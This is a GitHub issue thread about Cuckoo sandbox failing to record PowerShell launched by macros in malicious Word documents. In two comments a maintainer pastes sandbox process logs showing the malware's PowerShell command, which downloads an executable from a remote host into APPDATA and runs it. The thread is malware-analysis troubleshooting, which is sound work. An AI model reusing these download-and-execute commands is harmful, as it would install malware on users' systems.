### ISSUE TITLE
Macro execution on Maldoc

### ISSUE THREAD

**Issue by Nwinternights** [cuckoosandbox/cuckoo#1815]
Hi All,
I Don't know if it's my mistake or not but if I submit some MalDoc(not all) I get partial results such not executing Powershell commands embedded in macros. 
Of course all Macros/Activex on Trusted center are enabled on Office.
[doc.tar.gz](https://github.com/cuckoosandbox/cuckoo/files/1266372/doc.tar.gz)

[cuckoo.txt](https://github.com/cuckoosandbox/cuckoo/files/1266375/cuckoo.txt)
[analyzer.txt](https://github.com/cuckoosandbox/cuckoo/files/1266376/analyzer.txt)

**Comment by doomedraven** [comment]
they all should be disabled, but cuckoo should disable it for you, check packages for the office files, not sure if that disable all of them

**Comment by Nwinternights** [comment]
sorry...I wanted to say that all are disabled :-))))))

**Comment by Nwinternights** [comment]
Differences between Cuckoo 2 and Cucko 1.2

![cuckoo1 2](https://user-images.githubusercontent.com/18212777/29918301-3fbe7264-8e45-11e7-872e-f0887358f6af.jpg)
![cuckoo2](https://user-images.githubusercontent.com/18212777/29918302-3fc1542a-8e45-11e7-97f4-d0aa956491b2.jpg)

**Comment by doomedraven** [comment]
is your problem, works just fine on 2.0.4a5

97895999.doc
```
WINWORD.EXE 3264 "C:\Users\X\AppData\Local\Temp\97895999.doc" /q
powershell.exe 1108 powershell.exe -nop -Exec Bypass -Command (New-Object System.Net.WebClient).DownloadFile('http://honeygoodhoc.top/admin.php?f=1', $env:APPDATA + '\gIQMsc.exe'); Start-Process $env:APPDATA'\gIQMsc.exe';
```

**Comment by doomedraven** [comment]
and another one

```
WINWORD.EXE 3828 "C:\Users\X\AppData\Local\Temp\80251321662853.doc" /q
powershell.exe 804 -nop -Exec Bypass -Command (New-Object System.Net.WebClient).DownloadFile('http://newhostrcm.top/admin.php?f=1', $env:APPDATA + '\sATTfJY.exe'); Start-Process $env:APPDATA'\sATTfJY.exe';
```

**Comment by Nwinternights** [comment]
oky , i'll investigate on my cuckoo box. 
tks @doomedraven

**Comment by doomedraven** [comment]
you are welcome

**Comment by doomedraven** [comment]
<img width="1397" alt="captura de pantalla 2017-08-31 a las 12 30 57" src="https://user-images.githubusercontent.com/1856495/29919152-72b3f9fc-8e48-11e7-90f4-e41a6e37fe52.png">

this is nice :) @FernandoDoming tnx

**Comment by Nwinternights** [comment]
@doomedraven did you modifiy doc.py? I saw /q parameters that is not present on the original file.

**Comment by doomedraven** [comment]
no, i didn't modify nothing, just installed from pip, but office is patched by me, not by cuckoo, all that trusted stuff, activx, macro

**Comment by Nwinternights** [comment]
same here ....:-/ ok tks again..

**Comment by Nwinternights** [comment]
solved....Uninstalling cuckoo and reinstalling it ....:-/
a guy had the same problem
https://github.com/cuckoosandbox/cuckoo/issues/1669

**Comment by doomedraven** [comment]
but you sure what you was on 2.0.4a5?

**Comment by Nwinternights** [comment]
yes I was . infact i dunno what happened
